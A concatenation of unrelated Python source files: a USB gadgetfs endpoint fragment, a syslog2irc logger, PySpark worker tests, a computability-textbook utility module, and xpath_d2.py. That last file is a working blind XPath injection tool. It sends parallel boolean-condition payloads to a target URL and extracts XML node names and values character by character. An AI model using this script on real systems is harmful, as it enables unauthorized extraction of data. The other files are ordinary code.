child = multiprocessing.Process(target=WriterProcess)
self._ep_fds[endpoint_addr] = fd, child, pipe_w
else:
def ReceivePacket(unused_fd, unused_events):
data = pipe_r.recv()
print('OUT bEndpointAddress=0x{:02X} length={}'
.format(endpoint_addr, len(data)))
self._gadget.ReceivePacket(endpoint_addr, data)
def ReaderProcess():
while True:
data = os.read(fd, ep_size)
pipe_w.send(data)
child = multiprocessing.Process(target=ReaderProcess)
pipe_fd = pipe_r.fileno()
self._io_loop.add_handler(pipe_fd, ReceivePacket, self._io_loop.READ)
self._ep_fds[endpoint_addr] = fd, child, pipe_r
child.start()
print 'Started endpoint 0x{:02X}.'.format(endpoint_addr)
def StopEndpoint(self, endpoint_addr):
"""Deactivate the given endpoint."""
fd, child, pipe = self._ep_fds.pop(endpoint_addr)
pipe_fd = pipe.fileno()
child.terminate()
child.join()
if not endpoint_addr & usb_constants.Dir.IN:
self._io_loop.remove_handler(pipe_fd)
os.close(fd)
print 'Stopped endpoint 0x{:02X}.'.format(endpoint_addr)
def SendPacket(self, endpoint_addr, data):
"""Send a packet on the given endpoint."""
_, _, pipe = self._ep_fds[endpoint_addr]
pipe.send(data)
def HaltEndpoint(self, endpoint_addr):
"""Signal a stall condition on the given endpoint."""
fd, _ = self._ep_fds[endpoint_addr]
# Reverse I/O direction sets the halt condition on the pipe.
try:
if endpoint_addr & usb_constants.Dir.IN:
os.read(fd, 0)
else:
os.write(fd, '')
except OSError, e:
# gadgetfs always returns EBADMSG which we should ignore.
if e.errno != errno.EBADMSG:
raise
|
util.py
|
# -*- coding: utf-8 -*-
"""
syslog2irc.util
~~~~~~~~~~~~~~~
Various utilities
:Copyright: 2007-2015 Jochen Kupperschmidt
:License: MIT, see LICENSE for details.
"""
import logging
from threading import Thread
logging.basicConfig(format='%(asctime)s | %(message)s', level=logging.INFO)
def log(message, *args, **kwargs):
"""Log the message with a timestamp."""
logging.info(message.format(*args, **kwargs))
def start_thread(target, name):
"""Create, configure, and start a new thread."""
t = Thread(target=target, name=name)
t.daemon = True
t.start()
|
xpath_d2.py
|
import requests
import sys
from urllib.parse import unquote,quote
import multiprocessing
headers=dict()
post_parameters=dict()
cookies=dict()
iparam=sys.argv[1]
true_string=sys.argv[2].strip("\"")
element_range = 20
element_length = 40
value_length = 40
data_length=40
req = open("request.r","r").read().split("\n")
url = "https://" + req[1].split(": ")[1] + req[0].split(" ")[1]
for i in range(2,len(req)):
if req[i] == "":
post_body = req[i+1]
break
temp = req[i].split(": ")
headers[temp[0]] = temp[1]
for i in post_body.split("&"):
temp = i.split("=",1)
post_parameters[temp[0]] = unquote(temp[1])
cookies["a"]="b"
headers.pop("Cookie")
headers.pop("Content-Length")
def true_condition(resp):
if (str(resp).find(true_string) != -1):
return 1
else:
return 0
sess = []
def mp(inject,i,q):
post_parameters[iparam] = unquote(inject)
r = requests.post(url, data=post_parameters, headers=headers, cookies=cookies)
if(true_condition(r.content)):
q.append(i)
def mp_len(inject,i,j,q):
post_parameters[iparam] = unquote(inject)
r = requests.post(url, data=post_parameters, headers=headers, cookies=cookies)
if(true_condition(r.content)):
temp=[]
temp.append(j)
temp.append(i)
q.append(temp)
def mp_tag(inject,m,k,q):
post_parameters[iparam] = unquote(inject)
r = requests.post(url, data=post_parameters, headers=headers, cookies=cookies)
if (true_condition(r.content)):
temp = []
temp.append(m)
temp.append(k)
q.append(temp)
def engine(prefix,level):
jobs = []
# No. of child elements
q = multiprocessing.Manager().list()
for i in range(1,element_range+1):
orig = post_parameters[iparam]
inject = orig + " and name("+prefix+"/*["+str(i)+"])"
p = multiprocessing.Process(target=mp, args=(inject,i,q))
jobs.append(p)
p.start()
# nlen=i
for job in jobs:
job.join()
try:
nlen = max(q)
except:
nlen = 0
print("No. of nodes at level "+str(level) + ":" + str(nlen))
post_parameters[iparam] = orig
# String length of each element
slen = []
jobs = []
qt = multiprocessing.Manager().list()
for j in range(1, nlen + 1):
orig = post_parameters[iparam]
for i in range(1, element_length):
inject = orig + " and string-length(name(" + prefix + "/*[" + str(j) + "]))=" + str(i)
p = multiprocessing.Process(target=mp_len,args=(inject,i,j,qt))
jobs.append(p)
p.start()
for job in jobs:
job.join()
qt.sort()
for a in qt:
slen.append(a[1])
#print("String length of node" + str(a[0]) + " at level " + str(level) + ":" + str(a[1]))
# try:
# slen.append(max(qt))
# except:
# slen.append(0)
# print("String length of node" + str(j) + " at level " + str(level) + ":" + str(slen[j-1]))
# Name and Data of each element
chars = open("char", "r").read().split("\n")[:-1]
for j in range(0, nlen):
qt2 = multiprocessing.Manager().list()
for m in range(1, slen[j] + 1):
jobs = []
for k in chars:
inject = orig + " and substring(name(" + prefix + "/*[" + str(j + 1) + "])," + str(
m) + ",1)='" + k + "'"
p = multiprocessing.Process(target=mp_tag,args=(inject,m,k,qt2))
jobs.append(p)
p.start()
for job in jobs:
job.join()
qt2.sort()
nn = ""
for l1 in qt2:
nn+=str(l1[1])
print(nn)
#Data
jobs = []
# Value Length
qt5 = multiprocessing.Manager().list()
for i in range(1, value_length+1):
orig = post_parameters[iparam]
inject = orig + " and string-length(" + prefix + "/*["+str(j+1)+"])=" + str(i)
p = multiprocessing.Process(target=mp, args=(inject, i, qt5))
jobs.append(p)
p.start()
for job in jobs:
job.join()
# print(list(qt5))
if list(qt5) == []:
vlen=0
else:
vlen= max(qt5)
# print("Value string length : " + str(vlen))
post_parameters[iparam] = orig
# Value Name
qt3 = multiprocessing.Manager().list()
jobs = []
for u in range(1, vlen+1):
for k in chars:
inject = orig + " and substring(" + prefix + "/*["+str(j+1)+"]," + str(u) + ",1)='" + k + "'"
p = multiprocessing.Process(target=mp_tag, args=(inject, u, k, qt3))
jobs.append(p)
p.start()
for job in jobs:
job.join()
qt3.sort()
nn = ""
for l1 in qt3:
nn += str(l1[1])
print("\t",nn)
# level += 1
# prefix += "/*"
prefix = sys.argv[3].strip("\"")
level=1
# prefix =""
engine(prefix,level)
# for i in range(20):
# sess.append(session.get('http://httpbin.org/get'))
# for i in range(20):
# print(sess[i].result().content)
|
test_worker.py
|
# -*- encoding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import tempfile
import threading
import time
import unittest
has_resource_module = True
try:
import resource # noqa: F401
except ImportError:
has_resource_module = False
from py4j.protocol import Py4JJavaError
from pyspark import SparkConf, SparkContext
from pyspark.testing.utils import ReusedPySparkTestCase, PySparkTestCase, QuietTest
class WorkerTests(ReusedPySparkTestCase):
def test_cancel_task(self):
temp = tempfile.NamedTemporaryFile(delete=True)
temp.close()
path = temp.name
def sleep(x):
import os
import time
with open(path, "w") as f:
f.write("%d %d" % (os.getppid(), os.getpid()))
time.sleep(100)
# start job in background thread
def run():
try:
self.sc.parallelize(range(1), 1).foreach(sleep)
except Exception:
pass
import threading
t = threading.Thread(target=run)
t.daemon = True
t.start()
daemon_pid, worker_pid = 0, 0
cnt = 0
while True:
if os.path.exists(path):
with open(path) as f:
data = f.read().split(" ")
try:
daemon_pid, worker_pid = map(int, data)
except ValueError:
pass
# In case the value is not written yet.
cnt += 1
if cnt == 10:
raise
else:
break
time.sleep(1)
# cancel jobs
self.sc.cancelAllJobs()
t.join()
for i in range(50):
try:
os.kill(worker_pid, 0)
time.sleep(0.1)
except OSError:
break # worker was killed
else:
self.fail("worker has not been killed after 5 seconds")
try:
os.kill(daemon_pid, 0)
except OSError:
self.fail("daemon had been killed")
# run a normal job
rdd = self.sc.parallelize(range(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_after_exception(self):
def raise_exception(_):
raise RuntimeError()
rdd = self.sc.parallelize(range(100), 1)
with QuietTest(self.sc):
self.assertRaises(Py4JJavaError, lambda: rdd.foreach(raise_exception))
self.assertEqual(100, rdd.map(str).count())
def test_after_non_exception_error(self):
# SPARK-33339: Pyspark application will hang due to non Exception
def raise_system_exit(_):
raise SystemExit()
rdd = self.sc.parallelize(range(100), 1)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: rdd.foreach(raise_system_exit))
self.assertEqual(100, rdd.map(str).count())
def test_after_jvm_exception(self):
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write(b"Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name, 1)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: filtered_data.count())
rdd = self.sc.parallelize(range(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_accumulator_when_reuse_worker(self):
from pyspark.accumulators import INT_ACCUMULATOR_PARAM
acc1 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(range(100), 20).foreach(lambda x: acc1.add(x))
self.assertEqual(sum(range(100)), acc1.value)
acc2 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(range(100), 20).foreach(lambda x: acc2.add(x))
self.assertEqual(sum(range(100)), acc2.value)
self.assertEqual(sum(range(100)), acc1.value)
def test_reuse_worker_after_take(self):
rdd = self.sc.parallelize(range(100000), 1)
self.assertEqual(0, rdd.first())
def count():
try:
rdd.count()
except Exception:
pass
t = threading.Thread(target=count)
t.daemon = True
t.start()
t.join(5)
self.assertTrue(not t.is_alive())
self.assertEqual(100000, rdd.count())
def test_with_different_versions_of_python(self):
rdd = self.sc.parallelize(range(10))
rdd.count()
version = self.sc.pythonVer
self.sc.pythonVer = "2.0"
try:
with QuietTest(self.sc):
self.assertRaises(Py4JJavaError, lambda: rdd.count())
finally:
self.sc.pythonVer = version
def test_python_exception_non_hanging(self):
# SPARK-21045: exceptions with no ascii encoding shall not hanging PySpark.
try:
def f():
raise RuntimeError("exception with 中 and \xd6\xd0")
self.sc.parallelize([1]).map(lambda x: f()).count()
except Py4JJavaError as e:
self.assertRegex(str(e), "exception with 中")
class WorkerReuseTest(PySparkTestCase):
def test_reuse_worker_of_parallelize_range(self):
rdd = self.sc.parallelize(range(20), 8)
previous_pids = rdd.map(lambda x: os.getpid()).collect()
current_pids = rdd.map(lambda x: os.getpid()).collect()
for pid in current_pids:
self.assertTrue(pid in previous_pids)
@unittest.skipIf(
not has_resource_module or sys.platform != "linux",
"Memory limit feature in Python worker is dependent on "
"Python's 'resource' module on Linux; however, not found or not on Linux.",
)
class WorkerMemoryTest(unittest.TestCase):
def setUp(self):
class_name = self.__class__.__name__
conf = SparkConf().set("spark.executor.pyspark.memory", "2g")
self.sc = SparkContext("local[4]", class_name, conf=conf)
def test_memory_limit(self):
rdd = self.sc.parallelize(range(1), 1)
def getrlimit():
import resource
return resource.getrlimit(resource.RLIMIT_AS)
actual = rdd.map(lambda _: getrlimit()).collect()
self.assertTrue(len(actual) == 1)
self.assertTrue(len(actual[0]) == 2)
[(soft_limit, hard_limit)] = actual
self.assertEqual(soft_limit, 2 * 1024 * 1024 * 1024)
self.assertEqual(hard_limit, 2 * 1024 * 1024 * 1024)
def tearDown(self):
self.sc.stop()
class WorkerSegfaultTest(ReusedPySparkTestCase):
@classmethod
def conf(cls):
_conf = super(WorkerSegfaultTest, cls).conf()
_conf.set("spark.python.worker.faulthandler.enabled", "true")
return _conf
def test_python_segfault(self):
try:
def f():
import ctypes
ctypes.string_at(0)
self.sc.parallelize([1]).map(lambda x: f()).count()
except Py4JJavaError as e:
self.assertRegex(str(e), "Segmentation fault")
@unittest.skipIf(
"COVERAGE_PROCESS_START" in os.environ,
"Flaky with coverage enabled, skipping for now.",
)
class WorkerSegfaultNonDaemonTest(WorkerSegfaultTest):
@classmethod
def conf(cls):
_conf = super(WorkerSegfaultNonDaemonTest, cls).conf()
_conf.set("spark.python.use.daemon", "false")
return _conf
if __name__ == "__main__":
import unittest
from pyspark.tests.test_worker import * # noqa: F401
try:
import xmlrunner # type: ignore[import]
testRunner = xmlrunner.XMLTestRunner(output="target/test-reports", verbosity=2)
except ImportError:
testRunner = None
unittest.main(testRunner=testRunner, verbosity=2)
|
utils.py
|
"""Utilities module for the textbook "What Can Be Computed?" (WCBC)
This "utils" module provides various supporting functions for use with
the programs provided is online materials for the textbook "What Can
Be Computed?" (WCBC). (For an overview of the entire collection of
programs, see the file README.txt in this directory.)
Functionality provided by the utils module includes: reading and
writing text files, extracting names of functions from Python files
(useful for universal computation simulations), encoding multiple
strings as single strings and vice versa, creating random strings of
various kinds, manipulating alphabets such as the ASCII alphabet,
executing code with a timeout (in case it runs for a long time or
forever), formatting sets of strings, manipulating solutions of
nondeterministic programs, an exception class specific to WCBC,
facilities for testing.
"""
# The following line improves compatibility with Python version 2.x
from __future__ import print_function
# Check that the version of Python being used is sufficiently recent.
import sys
def checkPythonVersion(shouldExit=True):
"""Check that the version of Python is recent enough (>=2.7).
If the version is too old, exit Python immediately unless instructed otherwise.
Args:
shouldExit (bool): Indicates the action that should be taken
if the version of Python is too old. If True, exit
immediately. Otherwise, print a warning message but then
return.
"""
if sys.version_info < (2, 7):
print("Sorry, but there's a problem: you need Python version at least 2.7. Exiting now.")
if shouldExit:
sys.exit()
checkPythonVersion()
# Import all the modules we need.
import re, sys, threading, random, time, os, os.path
# Importing the queue module is a little tricky, since the name was
# changed in version 3. The following code takes care of this issue.
if sys.version_info < (3, 0):
import Queue
queue = Queue
else:
import queue
haltComputations = threading.Event()
"""An event that signals long-running computations to exit."""
aRandom = random.Random()
"""A random number generator that can be used by all functions that
want one.
"""
inf = float("inf")
"""A value representing positive infinity.
In version >= 3.5 of Python, math.inf would be more elegant here, but
it's better to use an idiom that also works with earlier versions of
Python.
"""
def extractMainFunctionName(progString):
"""Extract the name of the main function in a Python program.
Given a Python program as defined in the book, return a string
containing the name of the "main" function: that is, the first
Python function defined within progString. This is done by
searching for the first line that begins with the characters "def"
followed by whitespace, then returning the identifier immediately
following that whitespace. Clearly, this is not infallible, but it
works for all of the example programs provided with the book
materials. If desired, one could use Python parsing tools to
locate the first defined function with perfect reliability. But
that approach is more complex than we need for the illustrative
examples provided with the book.
Args:
progString (str): string containing the Python program to be
examined.
Returns:
str: The name of the main function if one could be found,
otherwise the empty string.
"""
# This is the regular expression that searches for the main
# function using the heuristic described above.
mainFunctionRegex = r"^def\s+([a-zA-Z0-9_]*)"
matchResult = re.search(mainFunctionRegex, progString, re.MULTILINE)
if matchResult:
return matchResult.group(1)
else:
# Return empty string if we couldn't find any function
# definitions. This should never happen when processing a
# legitimate SISO program.
return ""
def extractMainFunction(progString, localVars):
"""Given a Python program as defined in the book, return a reference
to the "main" function: that is, the first Python function defined
within progString. The localVars parameter should be
Args:
progString (str): string containing the Python program to be
examined.
localVars (dict): the "locals()" dictionary of the calling
function, as explained further in the source code comment.
Returns:
fn: A reference to the main function if one could be
found. Otherwise a WcbcException is raised.
"""
functionName = extractMainFunctionName(progString)
# Python has a standard built-in dictionary called "locals()"
# which contains, among other things, all the functions that are
# currently defined. We can get a reference to the desired
# function by looking it up in this dictionary, using the name of
# the function as the key.
if functionName in localVars:
progFunction = localVars[functionName]
else:
raise WcbcException(
"function " + functionName + " not defined, so cannot extract or simulate it"
)
return progFunction
def readFile(fileName):
"""Read a file, returning its contents as a single string.
Args:
fileName (str): The name of the file to be read.
Returns:
str: The contents of the file.
"""
fileContents = ""
with open(fileName) as inputFile:
fileContents = inputFile.read()
return fileContents
# Define a very short convenient alias for the readFile function
rf = readFile
def writeFile(fileName, fileContents):
"""Write a file, overwriting any existing content with the given content.
Args:
fileName (str): The name of the file to be written or overwritten.
fileContents (str): The contents of the file to be written,
stored as a single string that may contain newlines.
"""
with open(fileName, "w") as outputFile:
outputFile.write(fileContents)
def ESS(inString1, inString2):
"""Encode two strings as a single string.
ESS is an acronym for Encode as Single String. This function uses
the encoding method suggested in the textbook: the encoding
consists of the length of the first string, followed by a space
character, followed by the two strings concatenated together.
Args:
inString1 (str): The first string to be encoded
inString2 (str): The second string to be encoded
Returns:
str: A single string encoding inString1 and inString2
Example:
>>> ESS('abc', 'defg')
'3 abcdefg'
"""
return str(len(inString1)) + " " + inString1 + inString2
def DESS(inString):
"""Decode a single string into two strings (inverse of ESS).
DESS is an acronym for DEcode from Single String. This function
uses the method suggested in the textbook for converting a single
string that encodes two strings back into the original two
strings. DESS is the inverse of the function ESS.
Args:
inString (str): The string to be decoded
Returns:
(str, str): A 2-tuple containing the two strings that were decoded from the input.
Example:
>>> DESS('3 abcdefg')
('abc', 'defg')
"""
# split on the first space character
(theLength, remainder) = inString.split(" ", 1)
inString1 = remainder[: int(theLength)]
inString2 = remainder[int(theLength) :]
return (inString1, inString2)
def randomAlphanumericString(length=None, maxLength=20):
"""Generate a random alphanumeric string.
This function generates and returns a random alphanumeric string,
where the length of the string can be specified or can also be
selected randomly. The individual characters in the string are
selected uniformly at random.
Args:
length (int): The desired length of the string. Defaults to
None. If None, the length of the string will be chosen
uniformly at random between 0 and maxLength-1.
maxLength: When the length of the string is chosen at random,
the maximum length is maxLength-1. This parameter is only
relevant if length is None.
Returns:
str: The randomly generated alphanumeric string.
"""
characters = "abcdefghijklmnopqstuvwxyzABCDEFGHIJKLMNOPQSTUVWXYZ0123456789"
if length == None:
length = aRandom.randint(0, maxLength)
chosenCharacters = []
for i in range(length):
randomCharacter = aRandom.choice(characters)
chosenCharacters.append(randomCharacter)
return "".join(chosenCharacters)
def randomDigitalString(length=None, maxLength=20):
"""Generate a random string of numeric digits.
This function generates and returns a random string of numeric
digits, where the length of the string can be specified or can
also be selected randomly. The individual digits in the string are
selected uniformly at random, except that the first digit cannot
be 0.
Args:
length (int): The desired length of the string. Defaults to
None. If None, the length of the string will be chosen
uniformly at random between 0 and maxLength-1.
maxLength: When the length of the string is chosen at random,
the maximum length is maxLength-1. This parameter is only
relevant if length is None.
Returns:
str: The randomly generated string of digits.
"""
characters = "0123456789"
if length == None:
length = aRandom.randint(0, maxLength)
chosenCharacters = []
for i in range(length):
randomCharacter = aRandom.choice(characters)
# first character must be nonzero
while i == 0 and randomCharacter == "0":
randomCharacter = aRandom.choice(characters)
chosenCharacters.append(randomCharacter)
return "".join(chosenCharacters)
def randomString(alphabet, length=None, maxLength=20):
"""Generate a random string of characters from a given up a bit.
This function generates and returns a random string of characters
from a given alphabet, where the length of the string can be
specified or can also be selected randomly. The individual
characters in the string are selected uniformly at random.
Args:
alphabet (list of characters): A list of characters in the
alphabet to be used.
length (int): The desired length of the string. Defaults to
None. If None, the length of the string will be chosen
uniformly at random between 0 and maxLength-1.
maxLength: When the length of the string is chosen at random,
the maximum length is maxLength-1. This parameter is only
relevant if length is None.
Returns:
str: The randomly generated string.
"""
characters = alphabet
if length == None:
length = aRandom.randint(0, maxLength)
chosenCharacters = []
for i in range(length):
randomCharacter = aRandom.choice(characters)
chosenCharacters.append(randomCharacter)
return "".join(chosenCharacters)
def asciiAlphabetAsList():
"""Return a list consisting of the 128 ASCII characters"""
asciiAlphabet = []
for i in range(128):
asciiAlphabet.append(chr(i))
return asciiAlphabet
ASCII_ALPHABET = asciiAlphabetAsList()
"""A list consisting of the 128 ASCII characters"""
def geneticAlphabetAsList():
"""Return a list consisting of the 4 characters 'A', 'C', 'G', 'T'"""
return ["A", "C", "G", "T"]
def boolToYes(b):
"""Convert a Boolean input into 'yes' or 'no'
Args:
b (bool): The Boolean value to be converted
Returns:
str: 'yes' if b is True, and 'no' otherwise.
"""
if b:
return "yes"
else:
return "no"
def nextShortLex(s, alphabet):
"""Return the next string in shortlex ordering on a given alphabet.
Shortlex is an ordering that lists strings according to length,
with strings of the same length being ordered
lexicographically. This function takes a string on some particular
alphabet as input, and returns the next string on that alphabet in
the shortlex ordering.
Args:
s (str): The string whose successor will be returned.
alphabet (list of characters): A list of characters in the
alphabet to be used.
Returns:
str: The successor of s in the shortlex ordering, assuming the
given alphabet.
Example:
>>> nextShortLex('aab', ['a', 'b', 'c'])
'aac'
>>> nextShortLex('ccc', ['a', 'b', 'c'])
'aaaa'
"""
first = alphabet[0]
last = alphabet[-1]
if s == "":
return str(first)
chars = [c for c in s]
L = len(chars)
# The Boolean variable overflow will indicate whether or not this
# is the last string of the current length (and hence whether we
# need to "overflow" to the first string with length one greater)
overflow = True
for i in range(L - 1, -1, -1):
currentChar = chars[i]
if currentChar != last:
overflow = False
break
# Either we overflowed (and i=0), or we didn't overflow, in which
# case the value of i is now the index of the rightmost character
# that can be incremented. Let's remember all the needed
# information about that character.
incrementIndex = i
incrementChar = currentChar
alphabetIndex = alphabet.index(currentChar)
if overflow:
# Treat overflow as a special case and return a string of
# length L+1 consisting entirely of the first character in the
# alphabet.
return first * (L + 1)
else:
# We didn't overflow, so manipulate the array of characters to
# produce the next string in lexicographic order. The
# rightmost character that can be incremented gets
# incremented...
chars[incrementIndex] = alphabet[alphabetIndex + 1]
# ...then all the characters to the right of that roll over to
# the first character in the alphabet.
for j in range(incrementIndex + 1, L):
chars[j] = first
return "".join(chars)
def nextASCII(s):
"""Return the successor of ASCII string s in the shortlex ordering.
For a detailed explanation, see the documentation of
nextShortLex(). This function is the same as nextShortLex(), for
the special case where the alphabet is the ASCII alphabet.
Args:
s (str): The ASCII string whose successor will be returned.
Returns:
str: The successor of ASCII string s in the shortlex ordering.
"""
return nextShortLex(s, ASCII_ALPHABET)
# Enter supposedly infinite loop. In fact, we exit if the event
# haltComputations is signalled, or if the fixed timeout expires.
# This helps to prevent problems with automated testing of code that
# enters infinite loops.
def loop():
"""Enter an infinite loop, but with features that facilitate testing.
This function supposedly enters an infinite loop. The intention is
that it should be used for simulating infinite loops, but in fact
it is more sophisticated. The function waits on the
utils.haltComputations event, and exits immediately if that event
is signaled. This facilitates testing of code that deliberately
enters infinite loops. In addition, this function times out after
60 seconds. This prevents background threads looping indefinitely.
"""
timeout = 60 # one minute should be plenty
haltComputations.wait(timeout)
# reset the haltComputations event
haltComputations.clear()
def invokeAndStoreResult(fn, q, done, *inStrings):
"""Invoke a function and store its return value in a given queue.
Mostly intended as a private function used by
utils.runWithTimeout(). The invokeAndStoreResult() function
invokes a function (which itself is passed in as a parameter) with
certain arguments (also passed in as parameters), stores the
result in a queue data structure, then signals an event to declare
that it is finished. This makes it possible for other threads to
be aware of when the function has completed and for those threads
to obtain its return value.
Args:
fn (a function): The function that will be invoked.
q (a Python queue.Queue): A queue that will be used for storing the
return value. A queue is used because Python queues happen
to behave well in multithreaded environments. In fact, at
most one item will be stored in this queue.
done (a Python threading.Event): An event that will be
signaled when fn has returned.
*inStrings: A variable number of arguments that will be passed
on to fn.
"""
ret = fn(*inStrings)
q.put(ret)
done.set()
def runWithTimeout(timeout, fn, *inStrings):
"""Invoke a function with a timeout.
This invokes a function (which itself is passed in as a parameter)
with certain arguments (also passed in as parameters). If the
function completes within the given timeout, its return value is
returned. Otherwise, None is returned.
Args:
timeout (float): The number of seconds before the function
invocation times out. If None, this is set to a standard
value for running unit tests.
fn (a function): The function that will be invoked.
*inStrings: A variable number of arguments that will be passed
on to fn.
Returns:
object: None if fn times out, otherwise the return value of fn.
"""
if timeout == None:
timeout = TEST_TIMEOUT
# a queue for storing the return value of fn
q = queue.Queue()
# an event for signaling when fn has completed
done = threading.Event()
# create and start a separate thread in which to invoke the
# function
t = threading.Thread(target=invokeAndStoreResult, args=(fn, q, done) + inStrings)
t.start()
# wait for either the function to complete, or the duration of the
# timeout, whichever is earlier
done.wait(timeout)
# If it's a long-running computation that knows about the
# haltComputations event, tell it to stop now.
haltComputations.set()
# Reset for future computations
haltComputations.clear()
# if the queue is empty, the function did not complete, so return
# None
if q.empty():
retVal = None
else:
retVal = q.get()
return retVal
def formatASet(theSet):
"""Format a set of strings as a string.
The given set is returned enclosed by braces and with elements
separated by commas.
Args:
theSet (set of str): The set to be formatted.
Returns:
str: A string representing theSet, enclosed by braces and with
elements separated by commas.
Example:
>>> formatASet({'abc', 'd', 'ef'})
'{d,ef,abc}'
"""
return "{" + ",".join(theSet) + "}"
def formatSetOfSets(theSets):
"""Format a set of frozensets of strings as a single string.
Each frozenset of strings is formatted using utils.formatASet(),
and the resulting strings are separated by space characters.
Args:
theSets (set of frozensets of str): The set of frozensets to
be formatted.
Returns:
str: A string representing theSets.
Example:
>>> set1 = frozenset({'abc', 'd', 'ef'})
>>> set2 = frozenset({'w', 'xy', 'z'})
>>> formatSetOfSets({set1, set2})
'{ef,abc,d} {xy,z,w}'
"""
formattedSets = [formatASet(s) for s in theSets]
return " ".join(formattedSets)
def sortByNthElement(theList, N):
"""Sort a list of items by the Nth element of each item.
Args:
theList (iterable of indexable items): The list of items to be sorted.
N (int): The index of the elements that should be used for the sorting.
Returns:
list: A new list sorted in increasing order by the Nth element of each item in theList.
"""
return sorted(theList, key=lambda x: x[N])
def killAllThreadsAndExit():
"""Exit Python, which also kills all Python threads.
This is useful for debugging and in certain other situations,
since there is no reliable way to kill Python threads.
"""
# Best to flush any messages before we exit, otherwise they may
# not be printed.
sys.stdout.flush()
os._exit(0)
class NonDetSolution:
"""Manages solutions to nondeterministic programs.
NonDetSolution is a class that can be used to arrange for
nondeterministic (i.e. multithreaded) Python programs to return a
value. For an example of how to use it, see the program
ndContainsNANA.py, which is also explained in the book. The basic
idea is to create a single NonDetSolution object nds to be used by
the nondeterministic program. The nds object will be passed to
each thread created, then nds and the list of threads will be
passed to waitForOnePosOrAllNeg() in order to obtain the program's
solution.
"""
printLock = threading.Lock()
"""A static lock shared between all NonDetSolution objects -- the
intention is that this can be used for debugging. Specifically,
you can acquire the printLock, print some debugging information,
then release the lock.
"""
def __init__(self):
self.solution = "no"
"""str: Stores the solution to the problem being solved. By default,
it has the value 'no'."""
# This lock protects access to the above solution field.
self.solnLock = threading.Lock()
"""threading.Lock: protects access to the above solution field"""
self.done = threading.Event()
"""threading.Event: Will be used to signal when either a positive
solution has been found or all threads have terminated with
negative solutions."""
def waitUntilDone(self):
"""Wait until we receive the signal that a positive solution has been
found or all threads have terminated negatively."""
self.done.wait()
def setDone(self):
"""Send the signal that a positive solution has been found or all
threads have terminated negatively."""
self.done.set()
def setSolution(self, solution):
"""Set the solution to the given value, and signal if it's positive.
This is a setter for the solution attribute. In addition, if
the new value for the solution attribute is positive
(i.e. anything other than the string "no"), we signal this
object's event attribute, done. This will enable other threads
to become aware that a positive solution has been found.
"""
# We only take action for positive solutions. If the given
# solution is 'no', we leave the default value of 'no'
# untouched -- and if another thread has meanwhile set the
# solution to a positive value, we should certainly not set it
# back to 'no' because positive solutions take precedence
# anyway.
if solution != "no":
self.solnLock.acquire()
self.solution = solution
self.solnLock.release()
# Signal that a positive solution has been found.
self.setDone()
def getSolution(self):
"""Return the stored value of the solution."""
self.solnLock.acquire()
solution = self.solution
self.solnLock.release()
return solution
def waitForOnePosOrAllNeg(threads, nonDetSolution):
"""Wait until one of the threads terminates positively or all terminate negatively.
Each of the threads in the given list will be started. Each of
these threads must already possess a reference to the given
nonDetSolution instance, since this will be used to signal if and
when a positive solution is found. When a positive solution is
found by one of the threads, the value of that solution is
returned. Otherwise, we wait until threads terminate and then
return the negative solution, 'no'.
Args:
threads (list of threading.Thread): Threads that will be started.
nonDetSolution (NonDetSolution): A NonDetSolution object used
to store and manipulate the solution being computed by the
given threads.
Returns:
str: The solution that was found.
"""
# check to see if the number of threads is getting too big
maxThreads = 500
if len(threads) + threading.active_count() > maxThreads:
NonDetSolution.printLock.acquire()
print(
"Fatal error in waitForOnePosOrAllNeg: you attempted to run more than",
maxThreads,
"""threads simultaneously.
In theory this isn't a problem, but in practice your Python
implementation may encounter difficulties. To avoid these potential
problems, all threads will now be killed.""",
)
NonDetSolution.printLock.release()
killAllThreadsAndExit()
# start each thread
for t in threads:
# print('starting', t)
t.start()
# create and start yet another thread, whose job it will be to
# detect when all the other threads have terminated
allTerminatedThread = threading.Thread(target=waitAllTerminated, args=(threads, nonDetSolution))
allTerminatedThread.start()
nonDetSolution.waitUntilDone()
return nonDetSolution.getSolution()
def waitAllTerminated(threads, nonDetSolution):
"""Wait until all the given threads have terminated, then signal.
When all threads have terminated, signal this fact via the
nonDetSolution object.
Args:
threads (list of threading.Thread): Threads that will be waited for.
nonDetSolution (NonDetSolution): A NonDetSolution object used
to store and manipulate the solution being computed by the
given threads.
"""
# wait for each thread to complete
for t in threads:
t.join()
nonDetSolution.setDone()
class WcbcException(Exception):
"""A simple wrapper of the standard Python Exception class.
WcbcException instances are used to indicate unexpected or
unhandled situations within the WCBC package.
"""
def __init__(self, *args, **kwargs):
Exception.__init__(self, *args, **kwargs)
################################################################################
#### The following settings control testing and are not relevant for
#### running "normal" programs that aren't tests.
################################################################################
VERBOSE_TESTS = True
BRIEF_TESTS = True
NUM_BRIEF_TESTS = 1
TEST_TIMEOUT = 10.0
################################################################################
# tprint stands for "test print" -- for printing output in a test function
def tprint(*args, **kwargs):
"""Print output within a test function
"tprint" stands for "test print". This is a wrapper for the
standard Python print function. It prints nothing unless
VERBOSE_TESTS is True.
"""
if VERBOSE_TESTS:
print(*args, **kwargs)
sys.stdout.flush()
def isPrime(M):
"""Return True if integer M is prime, and False otherwise.
This is used for testing certain functions; see e.g. factor.py. A
simple, inefficient algorithm is employed.
"""
for x in range(2, M):
if M % x == 0:
return False
return True
|
blockly_tool.py
|
#!/usr/bin/env python3
# Software License Agreement (BSD License)
#
# Copyright (c) 2019, UFACTORY, Inc.
# All rights reserved.
#
